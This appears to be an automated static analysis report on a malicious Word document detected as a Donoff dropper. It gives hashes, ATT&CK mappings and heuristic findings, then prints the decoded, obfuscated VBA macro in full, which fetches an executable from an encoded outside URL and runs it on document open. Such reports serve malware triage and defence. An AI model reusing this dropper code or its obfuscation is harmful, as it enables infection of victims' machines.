Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6391314437e37f7…

MALICIOUS

Office (OLE)

184.0 KB Created: 2016-05-18 22:54:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: 5ee2826df71cba6ea09b4e91298f9673 SHA-1: d916f3aec1072812187ac3c336257b26a7b34b18 SHA-256: c6391314437e37f723c2863a9c465d26ac0e76a18aedad701cb554bac0895a3d
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains VBA macros, including a Document_Open macro that triggers the execution of WScript.Shell. This indicates the file is designed to download and execute a secondary payload, a common tactic for malware droppers. The ClamAV detection as 'Doc.Dropper.Donoff' further supports this assessment.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim YTYHvMy As String
    Set FwOAjkes = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim lgtAQkWSsr As Boolean, RKLHuagrZb As Integer
    Set AnOwrplIi = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    Set UYDawqMqKZ = AnOwrplIi
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub Yyczsv(ByVal msoREbHRg As Integer, ByVal fyrHqVmcqW As Variant, ByVal jAStzg As Variant, ByVal qkTjdr As Object, ByVal ZItQEuJW As Variant, ByVal MvhHS As Integer, ByVal wCQmt As String)
    CallByName qkTjdr, wCQmt, 1, jAStzg, ZItQEuJW, fyrHqVmcqW
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim cdBkLmGIW As Integer
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8921 bytes
SHA-256: 817d22b31c0d356e4091be6df6a571aaa271961fc78d1aef43ff7081a5b10673
Detection
ClamAV: No threats found
Obfuscation or payload: likely
166 of 247 identifiers look randomly generated (e.g. 'CWvH4FVkTRaTYuAxrOGEIsHdtKFeGYuX') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function BfAXNeAvth() As Integer
NddjA
If XBccwj(5601, "AFdEZROnl3KupGt8dyusf") Then
kdFtL
Else
nuvzfFK
End If
BfAXNeAvth = 8139
End Function
Private Sub Document_Open()
Dim cdBkLmGIW As Integer
Dim vEQKcZwik As Integer
EVyANS.mUOaCnq
End Sub
Private Sub mRJBz()
mJgHQ False, False, 4238
gcLIjQ True
End Sub

Attribute VB_Name = "EVyANS"
Private Function iAzsYSi() As String
iAzsYSi = vuhepCEa.vDnvYyHf("3oLDj9", "P3R39OCLE3So9S")
End Function
Private Function QKUDQo() As String
QKUDQo = "yaTBPzzqTUcSQtBE3DTZSh"
End Function
Private Function OOLHqHn() As String
OOLHqHn = vuhepCEa.vDnvYyHf("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
Private Function LrKuGVcf() As String
Dim oFCOThwJ As Integer, GJjGE As String
LrKuGVcf = vuhepCEa.vDnvYyHf("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
Private Function rxNlBsYJgf() As String
bLjwgJSUR = "Xcec07A7sMyqqphBJdqMiYM6e1n"
rxNlBsYJgf = vuhepCEa.vDnvYyHf("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
Private Function usbTVQw() As String
usbTVQw = XhQVhW
End Function
Private Sub ugQJPdNec(ByVal fNSfnHxBZu As String, ByVal tcWoyFVZ As String, ByVal CqNlsoBFp As Variant, ByVal kHysdmQYN As String)
Dim tEjGi As String
Dim yzeOsya As String
IaFbCbvQf = 5255
Set lFSQRhj = HgIjr.aglPXucX
oIdgyMEhj.XFqDwI 1, vuhepCEa.vDnvYyHf("LBoZgmq/", "mTZypoeq"), lFSQRhj
oIdgyMEhj.RkURSUq lFSQRhj, 8172, vuhepCEa.vDnvYyHf("PiG1UjQ", "OipPeGni"), PTeEPbdC
oIdgyMEhj.PHIloBIoQ CqNlsoBFp, PTeEPbdC, lFSQRhj, 7897, DlBSx
oIdgyMEhj.ziLCmkuNhj 2, vuhepCEa.vDnvYyHf("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), fNSfnHxBZu, lFSQRhj
oIdgyMEhj.RkURSUq lFSQRhj, 8172, vuhepCEa.vDnvYyHf("KMwhE6", "6C6lo6Eswe"), PTeEPbdC
End Sub
Private Function AUUxg() As String
AUUxg = vuhepCEa.vDnvYyHf("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
Private Function wvdXdacLdh() As String
QhJzBSkuli = 9116
wvdXdacLdh = vuhepCEa.vDnvYyHf("PiG1UjQ", "OipPeGni")
End Function
Private Sub ILHESLY()
Dim rsSUpNilWx As Integer
On Error GoTo iXThHt
hboOvyFIME usbTVQw, rRMGIZYHS
nHFskkviX = "e98AKWct7qR5s3fxAsherI9T1C7"
ASBVL rRMGIZYHS, "9P5FyR3Adyc8Mdv2L3VbfsY03VDOZ", False
Exit Sub
iXThHt:
End Sub
Private Sub hboOvyFIME(ByVal QPkSrt As String, ByVal pnvMJyvd As String)
Set yjchvtBrHe = HgIjr.UYDawqMqKZ
oIdgyMEhj.Yyczsv 6693, False, vuhepCEa.vDnvYyHf("KAgQjJ2L", "GKLEAT"), yjchvtBrHe, QPkSrt, 9594, wvdXdacLdh
LfPYoESsUK = False
oIdgyMEhj.ziLCmkuNhj vuhepCEa.vDnvYyHf("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), AUUxg, OOLHqHn, yjchvtBrHe
eNLxFz = "CR5P0DL8WcqvghvKrDrTRoNHtX"
oIdgyMEhj.RkURSUq yjchvtBrHe, 8172, vuhepCEa.vDnvYyHf("pZhU24tr", "SZte4ndZ"), "ZzhvC8JaBHNokDgKgbj6klft6"
ugQJPdNec pnvMJyvd, "90kkBPP2Q0FwrUlmyllG", oIdgyMEhj.kHkkw(vuhepCEa.vDnvYyHf("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), yjchvtBrHe), "WBzUjVrPcz6y2Pea06EJqyVoHZA6Tc"
End Sub
Private Function JDcAfmKw() As String
JDcAfmKw = vuhepCEa.vDnvYyHf("HqVgy4nv", "Evxvency")
End Function
Private Function PTeEPbdC() As String
usNmDIucf = "ODpiqUfwF5J0W0QTBc4MAY"
PTeEPbdC = "DmpvjsSg5LXwausuW2vN"
End Function
Private Function DIvDTY(ByVal DURnVvvG As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
DIvDTY = "ZtYfYuU9sIFclwg3hU"
End Function
Private Function jSxGl(ByVal LNuwQuAWO As String) As String
Dim oYXdDk As String
COovMr = "jNRQRM1dtGUp5vFzD19d4ulr2E8b80"
Set mrnaiI = oIdgyMEhj.nnvlFvCTM(iAzsYSi, rxNlBsYJgf, HgIjr.FwOAjkes)
jSxGl = mrnaiI(LNuwQuAWO)
End Function
Private Function XhQVhW() As String
XhQVhW = vuhepCEa.vDnvYyHf("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
Public Sub mUOaCnq()
DSFWQ = 8775
ILHESLY
End Sub
Private Function DlBSx() As String
DlBSx = vuhepCEa.vDnvYyHf("0dYXgI8ls", "lWrliYtgIe")
End Function
Private Sub ASBVL(ByVal cQdYqjBpz As String, ByVal vZDyXem As String, ByVal QyONxtQteG As Boolean)
Dim kMgliq As Integer
Dim NptxyFNuxj As String
oIdgyMEhj.PHIloBIoQ cQdYqjBpz, QKUDQo, HgIjr.FwOAjkes, 7897, JDcAfmKw
End Sub
Private Function rRMGIZYHS() As String
Dim rGoZjw As Boolean, rfrVlXygqD As String
NzmDVOpD = False
rRMGIZYHS = jSxGl(vuhepCEa.vDnvYyHf("IV6mZvAC", "CTECMmPI")) & LrKuGVcf
End Function

Attribute VB_Name = "HgIjr"
Private Sub rSynRWHBvi()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "U3YbQMxRjyUvhL00AxkIahQ5T"
End Sub
Public Function UYDawqMqKZ() As Object
Dim lgtAQkWSsr As Boolean, RKLHuagrZb As Integer
Set AnOwrplIi = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set UYDawqMqKZ = AnOwrplIi
End Function
Public Function FwOAjkes() As Object
Dim YTYHvMy As String
Set FwOAjkes = CreateObject("WScript.Shell")
End Function
Public Function aglPXucX() As Object
kSeUwKWLwH = 3434
Set aglPXucX = CreateObject("ADODB.Stream")
End Function
Private Sub iyTqL()
KbxYhbaay
AvUSfTJh "2U6aOVrwLAfDpjPd45", "CQGm2eKXP5Y5zi86fkX4rUwnG", False
ZOkaSukV
End Sub

Attribute VB_Name = "IkWvmuXyW"
Public Function CSRXdAtKM(ByVal zFXvocax As String, ByVal wYeQgox As String, ByVal eiQMkwgWr As String) As Boolean
Dim PSLPQgfGH As Boolean
CSRXdAtKM = InStr(1, zFXvocax, eiQMkwgWr)
End Function
Public Function BbvrjztgpJ(ByVal FNzbmrdxb As String, ByVal iLBXbm As Integer, ByVal NFzIS As Integer, ByVal UrIMeHBT As String) As String
Dim xbUlVccKi As String
BbvrjztgpJ = Mid(FNzbmrdxb, iLBXbm, 1)
End Function
Public Function IrmvcR(ByVal jQvaiat As Integer, ByVal HBOck As String, ByVal bZxgc As String) As Integer
Dim mVGkTxzQ As Integer
IrmvcR = Len(bZxgc)
End Function
Public Function CyFasBX(ByVal RbGmYiZCwT As String, ByVal fytgk As String) As String
Dim naQgYFNs As String
CyFasBX = RbGmYiZCwT & fytgk
End Function

Attribute VB_Name = "oIdgyMEhj"
Public Sub Yyczsv(ByVal msoREbHRg As Integer, ByVal fyrHqVmcqW As Variant, ByVal jAStzg As Variant, ByVal qkTjdr As Object, ByVal ZItQEuJW As Variant, ByVal MvhHS As Integer, ByVal wCQmt As String)
CallByName qkTjdr, wCQmt, 1, jAStzg, ZItQEuJW, fyrHqVmcqW
End Sub
Public Sub RkURSUq(ByVal RNAqBZZcT As Object, ByVal aztJBLPYZ As Integer, ByVal BDArQUS As String, ByVal plwWX As String)
CallByName RNAqBZZcT, BDArQUS, 1
End Sub
Public Function nnvlFvCTM(ByVal FKWUxLR As String, ByVal KGrZV As String, ByVal OosWfTWvEz As Object) As Variant
Set nnvlFvCTM = CallByName(OosWfTWvEz, KGrZV, 2, FKWUxLR)
End Function
Public Sub ziLCmkuNhj(ByVal ODnRlDFSa As Variant, ByVal aTctmMJ As String, ByVal hkqAIfxYT As Variant, ByVal dPHbadwqZ As Object)
CallByName dPHbadwqZ, aTctmMJ, 1, hkqAIfxYT, ODnRlDFSa
End Sub
Private Function mEaUh(ByVal tBKnR As String, ByVal MZCBfpFa As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "83qwoTI46fH86YIRhIHE7FqAntlCF0s", 3675
SlRmBd
End If
SCMoUyqWX
mEaUh = "tQz8C4xCDvJ9u97tL6"
End Function
Public Sub PHIloBIoQ(ByVal jimiivbZN As Variant, ByVal dbEzyHO As String, ByVal Gdacrqk As Object, ByVal kTudrn As Integer, ByVal fjIGF As String)
Dim pWwyoRc As String
Dim sGUPOnts As String
CallByName Gdacrqk, fjIGF, 1, jimiivbZN
End Sub
Public Function kHkkw(ByVal EfwqvF As String, ByVal jiFIXDnmA As Object) As Variant
kHkkw = CallByName(jiFIXDnmA, EfwqvF, 2)
End Function
Public Sub XFqDwI(ByVal RKtzznPc As Variant, ByVal EDLMZ As String, ByVal kzrbE As Object)
CallByName kzrbE, EDLMZ, 4, RKtzznPc
End Sub

Attribute VB_Name = "vuhepCEa"
Private Sub rtYfAOu()
OfSXF "H0lEIdAM8aCMLGge3IpGciCrDoY", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "ba4GRnfjqG6yf1AV9grVMn0qiq6L9", "sDIzGJuaBfwO5oKf7BrKi"
End If
End Sub
Public Function vDnvYyHf(ByVal tBFudfVBpz As String, ByVal FIcuAX As String) As String
Dim trehmFHGp As Boolean
Dim BLyxDWDTB As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For VXLJS = 1 To IkWvmuXyW.IrmvcR(3700, "CWvH4FVkTRaTYuAxrOGEIsHdtKFeGYuX", FIcuAX)
trehmFHGp = IkWvmuXyW.CSRXdAtKM(tBFudfVBpz, "OrIL4VcGdyxLXhOvtHroMG", IkWvmuXyW.BbvrjztgpJ(FIcuAX, VXLJS, 2535, "V25FpBOGrvp9NbRTIC"))
sEodtQL = "C5Et8sW3qle0qqFillRQXi3LRkYAzjX"
If Not trehmFHGp Then
vDnvYyHf = IkWvmuXyW.CyFasBX(vDnvYyHf, IkWvmuXyW.BbvrjztgpJ(FIcuAX, VXLJS, 2535, "tt5JSSHZJeeDcGRZsWsnokyEziCiI"))
End If
BhvAq = "XE0FuXtZYOZ9hgGwp3IWW6R"
Next
End Function
Private Function Ixqspr(ByVal FJiAiIAhcf As Boolean) As String
mGpHG "InUVmgqbElqdRQU0Bg8DmF5aiGDYH", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "bsqsPVkLKjYd5m5VwinNpJ9B8TC", 3269, False
aEcIpbKw True
wVbejPo
Ixqspr = "ZNdrcdGRU2SukNhC0t4n"
End Function